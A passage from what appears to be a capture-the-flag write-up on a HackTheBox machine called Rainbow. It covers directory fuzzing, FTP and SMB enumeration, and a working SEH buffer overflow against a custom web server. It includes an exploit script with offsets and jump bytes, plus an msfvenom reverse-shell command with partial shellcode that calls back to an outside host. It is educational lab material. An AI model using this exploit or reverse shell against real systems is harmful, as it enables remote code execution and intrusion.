200      GET       46l      151w     1478c http://10.129.234.59:8080/platnosci
200      GET       46l      151w     1478c http://10.129.234.59:8080/lewisandclark
200      GET       46l      151w     1478c http://10.129.234.59:8080/honeycards
200      GET       46l      151w     1478c http://10.129.234.59:8080/playadenbossa
200      GET       46l      151w     1478c http://10.129.234.59:8080/pnr
200      GET       46l      151w     1478c http://10.129.234.59:8080/postgraduate
200      GET       46l      151w     1478c http://10.129.234.59:8080/pozso
200      GET       46l      151w     1478c http://10.129.234.59:8080/pragma
200      GET       46l      151w     1478c http://10.129.234.59:8080/prepaidsim
200      GET       46l      151w     1478c http://10.129.234.59:8080/preparation
200      GET       46l      151w     1478c http://10.129.234.59:8080/prestations
200      GET       46l      151w     1478c http://10.129.234.59:8080/previsualiser
200      GET       46l      151w     1478c http://10.129.234.59:8080/previewx
200      GET       46l      151w     1478c http://10.129.234.59:8080/previo
200      GET       46l      151w     1478c http://10.129.234.59:8080/privates
200      GET       46l      151w     1478c http://10.129.234.59:8080/prizedraw
200      GET       46l      151w     1478c http://10.129.234.59:8080/privatus
200      GET       46l      151w     1478c http://10.129.234.59:8080/produitExterne
200      GET       46l      151w     1478c http://10.129.234.59:8080/public_includes
200      GET       46l      151w     1478c http://10.129.234.59:8080/pumps
200      GET       46l      151w     1478c http://10.129.234.59:8080/sunshine-coast
200      GET       46l      151w     1478c http://10.129.234.59:8080/quota
200      GET       46l      151w     1478c http://10.129.234.59:8080/rafolalmunia
200      GET       46l      151w     1478c http://10.129.234.59:8080/sitzungen
200      GET       46l      151w     1478c http://10.129.234.59:8080/readmore
200      GET       46l      151w     1478c http://10.129.234.59:8080/refg
200      GET       46l      151w     1478c http://10.129.234.59:8080/rico
200      GET       46l      151w     1478c http://10.129.234.59:8080/robes
200      GET       46l      151w     1478c http://10.129.234.59:8080/rosasmasfumats
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanaugustin
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanmiguelsalinas
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanrafael
200      GET       46l      151w     1478c http://10.129.234.59:8080/santacristinaaro
200      GET       46l      151w     1478c http://10.129.234.59:8080/santaeulalia
200      GET       46l      151w     1478c http://10.129.234.59:8080/santceloni
200      GET       46l      151w     1478c http://10.129.234.59:8080/santomera
200      GET       46l      151w     1478c http://10.129.234.59:8080/schemi
200      GET       46l      151w     1478c http://10.129.234.59:8080/searchcache
200      GET       46l      151w     1478c http://10.129.234.59:8080/sfRating
200      GET       46l      151w     1478c http://10.129.234.59:8080/sh-bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/shared_inc
200      GET       46l      151w     1478c http://10.129.234.59:8080/ship
200      GET       46l      151w     1478c http://10.129.234.59:8080/sherry
200      GET       46l      151w     1478c http://10.129.234.59:8080/shoppingBasket
200      GET       46l      151w     1478c http://10.129.234.59:8080/PageServer
200      GET       46l      151w     1478c http://10.129.234.59:8080/site52
200      GET       46l      151w     1478c http://10.129.234.59:8080/site58
200      GET       46l      151w     1478c http://10.129.234.59:8080/site73
200      GET       46l      151w     1478c http://10.129.234.59:8080/siz
200      GET       46l      151w     1478c http://10.129.234.59:8080/six
200      GET       46l      151w     1478c http://10.129.234.59:8080/skin_1
200      GET       46l      151w     1478c http://10.129.234.59:8080/skins_site
200      GET       46l      151w     1478c http://10.129.234.59:8080/skripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/slanadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/snr_email
200      GET       46l      151w     1478c http://10.129.234.59:8080/sobmosdde
200      GET       46l      151w     1478c http://10.129.234.59:8080/social-network
200      GET       46l      151w     1478c http://10.129.234.59:8080/sogo
200      GET       46l      151w     1478c http://10.129.234.59:8080/sofia
200      GET       46l      151w     1478c http://10.129.234.59:8080/soi
200      GET       46l      151w     1478c http://10.129.234.59:8080/sortir
200      GET       46l      151w     1478c http://10.129.234.59:8080/srsverify
200      GET       46l      151w     1478c http://10.129.234.59:8080/stat1
200      GET       46l      151w     1478c http://10.129.234.59:8080/stat2
200      GET       46l      151w     1478c http://10.129.234.59:8080/static_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistiky
200      GET       46l      151w     1478c http://10.129.234.59:8080/store_dev
200      GET       46l      151w     1478c http://10.129.234.59:8080/store3
200      GET       46l      151w     1478c http://10.129.234.59:8080/nvq-level-1-2-3
200      GET       46l      151w     1478c http://10.129.234.59:8080/suckers
200      GET       46l      151w     1478c http://10.129.234.59:8080/sujet
200      GET       46l      151w     1478c http://10.129.234.59:8080/surprise
200      GET       46l      151w     1478c http://10.129.234.59:8080/synchronize_db
200      GET       46l      151w     1478c http://10.129.234.59:8080/takeda
200      GET       46l      151w     1478c http://10.129.234.59:8080/talker
200      GET       46l      151w     1478c http://10.129.234.59:8080/tariffe
200      GET       46l      151w     1478c http://10.129.234.59:8080/tarifcard
200      GET       46l      151w     1478c http://10.129.234.59:8080/tavern
200      GET       46l      151w     1478c http://10.129.234.59:8080/templat
200      GET       46l      151w     1478c http://10.129.234.59:8080/tgv
200      GET       46l      151w     1478c http://10.129.234.59:8080/thumb_cache
200      GET       46l      151w     1478c http://10.129.234.59:8080/tienda2
200      GET       46l      151w     1478c http://10.129.234.59:8080/tictac
200      GET       46l      151w     1478c http://10.129.234.59:8080/tormos
200      GET       46l      151w     1478c http://10.129.234.59:8080/toredera
200      GET       46l      151w     1478c http://10.129.234.59:8080/tov
200      GET       46l      151w     1478c http://10.129.234.59:8080/tplates
200      GET       46l      151w     1478c http://10.129.234.59:8080/tovabb
200      GET       46l      151w     1478c http://10.129.234.59:8080/tplc
200      GET       46l      151w     1478c http://10.129.234.59:8080/tpe
200      GET       46l      151w     1478c http://10.129.234.59:8080/tqm
200      GET       46l      151w     1478c http://10.129.234.59:8080/transact
200      GET       46l      151w     1478c http://10.129.234.59:8080/travel-tips
200      GET       46l      151w     1478c http://10.129.234.59:8080/flightSearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/trim
200      GET       46l      151w     1478c http://10.129.234.59:8080/trio
200      GET       46l      151w     1478c http://10.129.234.59:8080/tubePress
200      GET       46l      151w     1478c http://10.129.234.59:8080/tubeace-admin
200      GET       46l      151w     1478c http://10.129.234.59:8080/ttweb
200      GET       46l      151w     1478c http://10.129.234.59:8080/uefa
200      GET       46l      151w     1478c http://10.129.234.59:8080/usermanagement
200      GET       46l      151w     1478c http://10.129.234.59:8080/usermanage
200      GET       46l      151w     1478c http://10.129.234.59:8080/validar
200      GET       46l      151w     1478c http://10.129.234.59:8080/vb4test
200      GET       46l      151w     1478c http://10.129.234.59:8080/vb_old
200      GET       46l      151w     1478c http://10.129.234.59:8080/mwaextraedit5
200      GET       46l      151w     1478c http://10.129.234.59:8080/vbtube
200      GET       46l      151w     1478c http://10.129.234.59:8080/gebuehren
200      GET       46l      151w     1478c http://10.129.234.59:8080/escapadas
200      GET       46l      151w     1478c http://10.129.234.59:8080/enoturismo
200      GET       46l      151w     1478c http://10.129.234.59:8080/escapadas_prueba
200      GET       46l      151w     1478c http://10.129.234.59:8080/novios
200      GET       46l      151w     1478c http://10.129.234.59:8080/nieve
200      GET       46l      151w     1478c http://10.129.234.59:8080/nuevoparadores
200      GET       46l      151w     1478c http://10.129.234.59:8080/omc
200      GET       46l      151w     1478c http://10.129.234.59:8080/portaventura
200      GET       46l      151w     1478c http://10.129.234.59:8080/rutamaestrazgo
200      GET       46l      151w     1478c http://10.129.234.59:8080/rutadelaplata
200      GET       46l      151w     1478c http://10.129.234.59:8080/thalasso
200      GET       46l      151w     1478c http://10.129.234.59:8080/sevilla_sep
200      GET       46l      151w     1478c http://10.129.234.59:8080/srt
200      GET       46l      151w     1478c http://10.129.234.59:8080/video_player
200      GET       46l      151w     1478c http://10.129.234.59:8080/videobox
200      GET       46l      151w     1478c http://10.129.234.59:8080/podcasts-audio
200      GET       46l      151w     1478c http://10.129.234.59:8080/villamartin
200      GET       46l      151w     1478c http://10.129.234.59:8080/vimage
200      GET       46l      151w     1478c http://10.129.234.59:8080/vino
200      GET       46l      151w     1478c http://10.129.234.59:8080/vmware
200      GET       46l      151w     1478c http://10.129.234.59:8080/voiture-occasion
200      GET       46l      151w     1478c http://10.129.234.59:8080/voicemail
200      GET       46l      151w     1478c http://10.129.234.59:8080/vopros
200      GET       46l      151w     1478c http://10.129.234.59:8080/wEWBAK
200      GET       46l      151w     1478c http://10.129.234.59:8080/warning
200      GET       46l      151w     1478c http://10.129.234.59:8080/warszawa
200      GET       46l      151w     1478c http://10.129.234.59:8080/warrior
200      GET       46l      151w     1478c http://10.129.234.59:8080/waterbondage
200      GET       46l      151w     1478c http://10.129.234.59:8080/watch-online
200      GET       46l      151w     1478c http://10.129.234.59:8080/web_data
200      GET       46l      151w     1478c http://10.129.234.59:8080/web_design
200      GET       46l      151w     1478c http://10.129.234.59:8080/web_help
200      GET       46l      151w     1478c http://10.129.234.59:8080/wfl
200      GET       46l      151w     1478c http://10.129.234.59:8080/wgs
200      GET       46l      151w     1478c http://10.129.234.59:8080/wise
200      GET       46l      151w     1478c http://10.129.234.59:8080/worklife
200      GET       46l      151w     1478c http://10.129.234.59:8080/workout
200      GET       46l      151w     1478c http://10.129.234.59:8080/guzel-pro
200      GET       46l      151w     1478c http://10.129.234.59:8080/easy1
200      GET       46l      151w     1478c http://10.129.234.59:8080/wodspewm
200      GET       46l      151w     1478c http://10.129.234.59:8080/xf
200      GET       46l      151w     1478c http://10.129.234.59:8080/xml-api
200      GET       46l      151w     1478c http://10.129.234.59:8080/xtemplates
200      GET       46l      151w     1478c http://10.129.234.59:8080/xtend-DK-Poker
200      GET       46l      151w     1478c http://10.129.234.59:8080/yummy
200      GET       46l      151w     1478c http://10.129.234.59:8080/zadz
200      GET       46l      151w     1478c http://10.129.234.59:8080/zack
200      GET       46l      151w     1478c http://10.129.234.59:8080/zh_cn
200      GET       46l      151w     1478c http://10.129.234.59:8080/zg
200      GET       46l      151w     1478c http://10.129.234.59:8080/zing
200      GET       46l      151w     1478c http://10.129.234.59:8080/zurgena
200      GET       46l      151w     1478c http://10.129.234.59:8080/zuowen
200      GET       46l      151w     1478c http://10.129.234.59:8080/~chat
200      GET       46l      151w     1478c http://10.129.234.59:8080/~alex
200      GET       46l      151w     1478c http://10.129.234.59:8080/~blog
200      GET       46l      151w     1478c http://10.129.234.59:8080/1153
200      GET       46l      151w     1478c http://10.129.234.59:8080/1322
200      GET       46l      151w     1478c http://10.129.234.59:8080/1492
200      GET       46l      151w     1478c http://10.129.234.59:8080/1494
200      GET       46l      151w     1478c http://10.129.234.59:8080/1495
200      GET       46l      151w     1478c http://10.129.234.59:8080/1529
200      GET       46l      151w     1478c http://10.129.234.59:8080/1556
200      GET       46l      151w     1478c http://10.129.234.59:8080/1561
200      GET       46l      151w     1478c http://10.129.234.59:8080/2546
200      GET       46l      151w     1478c http://10.129.234.59:8080/420
200      GET       46l      151w     1478c http://10.129.234.59:8080/440
200      GET       46l      151w     1478c http://10.129.234.59:8080/513
200      GET       46l      151w     1478c http://10.129.234.59:8080/494
200      GET       46l      151w     1478c http://10.129.234.59:8080/5734
200      GET       46l      151w     1478c http://10.129.234.59:8080/584
200      GET       46l      151w     1478c http://10.129.234.59:8080/7508
200      GET       46l      151w     1478c http://10.129.234.59:8080/747
200      GET       46l      151w     1478c http://10.129.234.59:8080/756
200      GET       46l      151w     1478c http://10.129.234.59:8080/770
200      GET       46l      151w     1478c http://10.129.234.59:8080/944
200      GET       46l      151w     1478c http://10.129.234.59:8080/935
200      GET       46l      151w     1478c http://10.129.234.59:8080/ANY
200      GET       46l      151w     1478c http://10.129.234.59:8080/Account-Password
200      GET       46l      151w     1478c http://10.129.234.59:8080/SWNAV_ADMIN
200      GET       46l      151w     1478c http://10.129.234.59:8080/[0-9]
200      GET       46l      151w     1478c http://10.129.234.59:8080/ViewData-Start
200      GET       46l      151w     1478c http://10.129.234.59:8080/_shared_content
200      GET       46l      151w     1478c http://10.129.234.59:8080/adams
200      GET       46l      151w     1478c http://10.129.234.59:8080/broomfield
200      GET       46l      151w     1478c http://10.129.234.59:8080/columbia
200      GET       46l      151w     1478c http://10.129.234.59:8080/davis
200      GET       46l      151w     1478c http://10.129.234.59:8080/fairfield
200      GET       46l      151w     1478c http://10.129.234.59:8080/downloads_pdfs
200      GET       46l      151w     1478c http://10.129.234.59:8080/emirates
200      GET       46l      151w     1478c http://10.129.234.59:8080/iberia
200      GET       46l      151w     1478c http://10.129.234.59:8080/kenton
200      GET       46l      151w     1478c http://10.129.234.59:8080/other-tours
200      GET       46l      151w     1478c http://10.129.234.59:8080/outlet_store
200      GET       46l      151w     1478c http://10.129.234.59:8080/p111
200      GET       46l      151w     1478c http://10.129.234.59:8080/other-tour
200      GET       46l      151w     1478c http://10.129.234.59:8080/taos
[####################] - 2m     30000/30000   0s      found:1495    errors:2
[####################] - 2m     30000/30000   277/s   http://10.129.234.59:8080/ 

However, visiting any of these returns 404. If I run again with --burp, I’ll see that sometimes it seems the request just returns the page root:

image-20250730135412398Click for full size image

This seems like more of an issue with the server getting overloaded than any actual real content here.

SMB - 445

I’ll try to authenticate with a guest account or junk account to see if there’s any anonymous SMB access, but I’m not able to get anything:

oxdf@hacky$ netexec smb 10.129.234.59 --shares
SMB         10.129.234.59   445    RAINBOW          [*] Windows 10 / Server 2019 Build 17763 x64 (name:RAINBOW) (domain:rainbow) (signing:False) (SMBv1:False)
SMB         10.129.234.59   445    RAINBOW          [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb 10.129.234.59 -u guest -p '' --shares
SMB         10.129.234.59   445    RAINBOW          [*] Windows 10 / Server 2019 Build 17763 x64 (name:RAINBOW) (domain:rainbow) (signing:False) (SMBv1:False)
SMB         10.129.234.59   445    RAINBOW          [-] rainbow\guest: STATUS_ACCOUNT_DISABLED 
oxdf@hacky$ netexec smb 10.129.234.59 -u oxdf -p oxdf --shares
SMB         10.129.234.59   445    RAINBOW          [*] Windows 10 / Server 2019 Build 17763 x64 (name:RAINBOW) (domain:rainbow) (signing:False) (SMBv1:False)
SMB         10.129.234.59   445    RAINBOW          [-] rainbow\oxdf:oxdf STATUS_LOGON_FAILURE 

Nothing here without auth.

FTP - 21

I’m able to connect to FTP using the anonymous account with no password:

oxdf@hacky$ ftp anonymous@10.129.234.59
Connected to 10.129.234.59.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
150 Opening ASCII mode data connection.
01-18-22  08:22AM                  258 dev.txt
01-18-22  08:30AM                54784 rainbow.exe
01-16-22  01:34PM                  479 restart.ps1
01-16-22  12:14PM       <DIR>          wwwroot
ftp> ls wwwroot
229 Entering Extended Passive Mode (|||50109|)
125 Data connection already open; Transfer starting.
01-16-22  11:48AM                 1523 index.html
226 Transfer complete.

There are four files. I’ll get them all (remembering to switch to binary mode first, or the executable will be really corrupted).

dev.txt is a note:

  • Our webserver has been crashing a lot lately. Instead of touching the code we added a restart script!
  • The server will dynamically pick a port when its default port is unresponsive (8080-8090).
  • We’ll fix this later by adding load balancer.

  • dev team

restart.ps1 is that script:

Set-Location -Path c:\rainbow
for(;;){
try{
If (!(Get-Process -Name rainbow -ErrorAction SilentlyContinue))
{Invoke-Expression "C:\rainbow\rainbow.exe" }
$proc = Get-Process -Name rainbow | Sort-Object -Property ProcessName -Unique -ErrorAction SilentlyContinue
If (!$proc -or ($proc.Responding -eq $false) or ($proc.WorkingSet -GT 200000*1024)) {
$proc.Kill()
Start-Sleep -s 10
Invoke-Expression "C:\rainbow\rainbow.exe"}
}
catch    {    }
Start-sleep -s 30
}

It finds the process, and if it doesn’t exist, isn’t responding, or it’s memory has gotten too big (2GB), it kills the process, sleeps 10 seconds, and then starts the exe again.

rainbox.exe is presumably the webserver, and a 32-bit Windows executable:

oxdf@hacky$ file rainbow.exe 
rainbow.exe: PE32 executable (console) Intel 80386, for MS Windows, 4 sections

index.html is the HTML for the port 8080 index page.

Shell as rainbow

Crashing Rainbow

Strategy

My first thought is that since the script is in place to restart rainbow.exe whenever it crashes, I will overwrite rainbow.exe with FTP and then crash it. When it restarts, it’ll run my binary and I’ll have a shell. I did open the binary in Ghidra and made some progress on understanding the basic flow, but decided to look for a crash in obvious places first, and come back if necessary.

Identify Crash

For that to work, I’ll need to crash the server.

I can get deep into fuzzing, but to start I’ll generate a giant payload and try sending it in different places with curl.

oxdf@hacky$ HUGE=$(python -c 'print("A"*1000)')

I can try sending it as the User-Agent header:

oxdf@hacky$ curl http://10.129.234.59:8080 -H "User-Agent: $HUGE"
<!DOCTYPE html>
...[snip]...

Or in the URL:

oxdf@hacky$ curl http://10.129.234.59:8080/$HUGE
<html><h1>404 Not Found</h1></html>

Both handle it nicely. What about POST body:

oxdf@hacky$ curl http://10.129.234.59:8080 -d "$HUGE"
curl: (56) Recv failure: Connection reset by peer

That looks like a crash. 500 doesn’t crash. 800 does. 600 and 650 just hang. There’s definitely something going on here.

Overwrite

Unfortunately for me, I’m not able to overwrite the binary over FTP:

ftp> binary
200 Type set to I.
ftp> put rev.exe rainbow.exe
local: rev.exe remote: rainbow.exe
229 Entering Extended Passive Mode (|||50115|)
550 Access is denied. 

So that’s a bit of a deadend for that idea.

Exploit

Debug Crash

Still, a crash is typically an opportunity to get code execution if I can control the input that overflows the buffer (which I should be able to). I’ll open a Windows VM and run rainbow.exe in x32dbg. I’ll disable the starting breakpoints (Options –> Preferences –> Events and uncheck everything). On running, a window pops up:

Starting Rainbow Server...!

I’ll send a request and it returns 404:

oxdf@hacky$ curl http://10.0.0.202:8080
<html><h1>404 Not Found</h1></html>

The rainbow.exe window shows the request:

[Debug] GET /

I didn’t load wwwroot/index.html into the same directory as rainbow.exe. If I create that, it comes back:

oxdf@hacky$ curl http://10.0.0.202:8080
<h1>Hello, 0xdf</h1>

I’ll send a large payload now:

oxdf@hacky$ curl http://10.0.0.202:8080 -d $HUGE

It hangs. At rainbow.exe:

[Debug] POST-Data AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA╨HìnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In x32dbg, there’s a crash at the bottom:

image-20250731172016135

EIP is not overwritten:

image-20250731172040838

But on the SEH tab:

image-20250731172124220

I’ve overwritten both the next handler as well as the pointer to the handler itself.

Calculate Offset

I’ll use a pattern tool (in this case Peda in gdb) to get a pattern:

oxdf@hacky$ gdb
...[snip]...
gdb-peda$ pattern_create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

I’ll send that as the curl POST payload:

oxdf@hacky$ curl http://10.0.0.202:8080 -d 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

It hangs, and back in x32dbg in the SEH tab:

image-20250731172524145

I can find those using pattern_offset:

gdb-peda$ pattern_offset 0x41484241
1095254593 found at offset: 664
gdb-peda$ pattern_offset 0x32424163
843202915 found at offset: 660

Python Script

At this point I’ll switch to a Python script to capture my progress as I build it. I’ll start with a script that can make a simple POST request to the server:

# /// script
# requires-python = ">=3.12"
# dependencies = [
#     "pwntools",
# ]
# ///
import sys
from pwn import remote


if len(sys.argv) != 3:
    print(f"usage: {sys.argv[0]} <ip> <port>")
    sys.exit(1)

data = b""

http_request = f"""POST / HTTP/1.1
Host: {sys.argv[1]}:{sys.argv[2]}
User-Agent: curl/8.5.0
Accept: */*
Content-Length: {len(data)}
Connection: keep-alive

""".replace('\n', '\r\n').encode()
http_request += data

p = remote(sys.argv[1], sys.argv[2])
p.send(http_request)
print(p.recvall(timeout=0.5).decode())
p.close()

The dependencies at the top are added with uv add --script exploit.py pwntools, which now allows uv to run this in a virtual environment and handle getting pwntools installed.

This returns the simple index.html I wrote:

oxdf@hacky$ uv run --script exploit.py 10.0.0.202 8080
[+] Opening connection to 10.0.0.202 on port 8080: Done
[+] Receiving all data: Done (146B)
[*] Closed connection to 10.0.0.202 port 8080
HTTP/1.1 200 OK
Cache-Control: no-cache, private
Content-Type: text/html
X-Powered-By: Rainbow 0.1
Content-Length: 20

<h1>Hello, 0xdf</h1>\x00

I’ll update it to overflow the POST data by changing one line:

data = b"A" * 1000

Now running it crashes:

oxdf@hacky$ uv run --script exploit.py 10.0.0.202 8080
[+] Opening connection to 10.0.0.202 on port 8080: Done
[+] Receiving all data: Done (0B)
[*] Closed connection to 10.0.0.202 port 8080

I can test the offsets by restarting x32dbg and updating data:

buffer_length = 1000
data = b"A" * 660
data += b"BBBB"
data += b"CCCC"
data += b"D" * (buffer_length - len(data))

It’s best practice to keep the buffer the same length during an overflow, so I’ll use “D” to fill out the buffer to 1000. Running this, I’ll see that the next exception handler is Bs and the handler is Cs:

image-20250801060928900

POP POP RET

m0chan has a really nice article, Win32 Buffer Overflow - SEH Overflows & Egghunters, that covers this kind of exploit and the strategy for exploiting it. Putting a POP POP RET gadget into the handler address will transfer control to a SEH record that I control.

A lot of the write-ups out there use mona, but it doesn’t work with x64dbg. I’ll use ERC. After installing, I’ll run ERC --SEH to show all the POP POP RET gadgets in the Log tab:

image-20250801061851905Click for full size image

There’s a ton. I’ll grab one from the top that’s in the actual binary and not a library (though it should work either way).

I’ll replace the Cs with this address:

buffer_length = 1000
data = b"A" * 660
data += b"BBBB"
data += p32(0x4094d8)
data += b"D" * (buffer_length - len(data)

I’ll need to add p32 to the from pwn import line if I didn’t just do * as well. I’ll add a breakpoint at the address where the crash happens (0x00406156), and run. It hits the breakpoint, and the next handler is the gadget address:

image-20250801062534627

If I add a break at the gadget and continue, I’ll hit it:

image-20250801062718676

Finding Space

I’ll step a through the RET and now it’s going to execute my Bs:

image-20250801063215008

This is good news in that it’s running whatever I put there. But I’ll also notice that after four bytes, it’s stuff I didn’t send.

Looking back, there is a stream of As, though there are some breaks in it with other stuff:

image-20250801063329458

Looking around a bit more, there is a stream of ~630 As before a stretch where there are some overwrites. I’ll jump back to that buffer. In this instance, it jumped to the Bs at 0xb3fbe4. The nice string of potentially uninterrupted As starts at 0xb3f950. I can test putting something different as the first four bytes of the data buffer (and shortening the As to 656), and confirm that that is the start of the buffer.

The offset here is 660, which makes sense:

oxdf@hacky$ python -c 'print(0xb3fbe4 - 0xb3f950)'
660

Calculating Jumps

I’d like to jump back 660. nasmshell (or there’s an MSF version msf-nasm_shell preinstalled on some pentesting distributions) will help see what commands look like:

oxdf@hacky$ nasmshell 
nasm> jmp -660
E967FDFFFF               jmp 0xfffffd6c

That’s a five byte instruction, and the buffer only has four bytes. A jmp short will work, but it can only do up to +/-127 bytes.

nasm> jmp short -100
EB9A                     jmp short 0xffffff9c

IfI jump back 8, and then use those 8 bytes for a jump back 652, that’s a total of jumping back 660. I’ll calculate the instructions:

nasm> jmp short -8
EBF6                     jmp short 0xfffffff8
nasm> jmp -652
E96FFDFFFF               jmp 0xfffffd74

The jmp short -8 will be replacing the Bs, and the jmp -652 will be eight bytes before, shortening the junk As:

buffer_length = 1000
data = b""
data += b"A" * (660 - 8)
data += b"\xe9\x6f\xfd\xff\xff" + b"EEE"   # jmp -652
data += b"\xeb\xf6" + b"BB"                # jmp short -8
data += p32(0x4094d8)
data += b"D" * (buffer_length - len(data))

I could have done 5 bytes, but I jumped 8, so I’ll make sure to pad in three bytes of junk (Es in this case). Running this, I’m able to jump back to the start of the buffer.

Local Exploit

I’ll have msfvenom generate shellcode for a reverse shell:

oxdf@hacky$ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -b '\x00\x0a\x0d' -f python -v sc LHOST=10.0.0.201 LPORT=9001
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1714 bytes
sc =  b""
sc += b"\xda\xd6\xbf\xa6\x4d\x06\xd0\xd9\x74\x24\xf4\x5e"
sc += b"\x33\xc9\xb1\x52\x31\x7e\x17\x83\xee\xfc\x03\xd8"
sc += b"\x5e\xe4\x25\xd8\x89\x6a\xc5\x20\x4a\x0b\x4f\xc5"
sc += b"\x7b\x0b\x2b\x8e\x2c\xbb\x3f\xc2\xc0\x30\x6d\xf6"
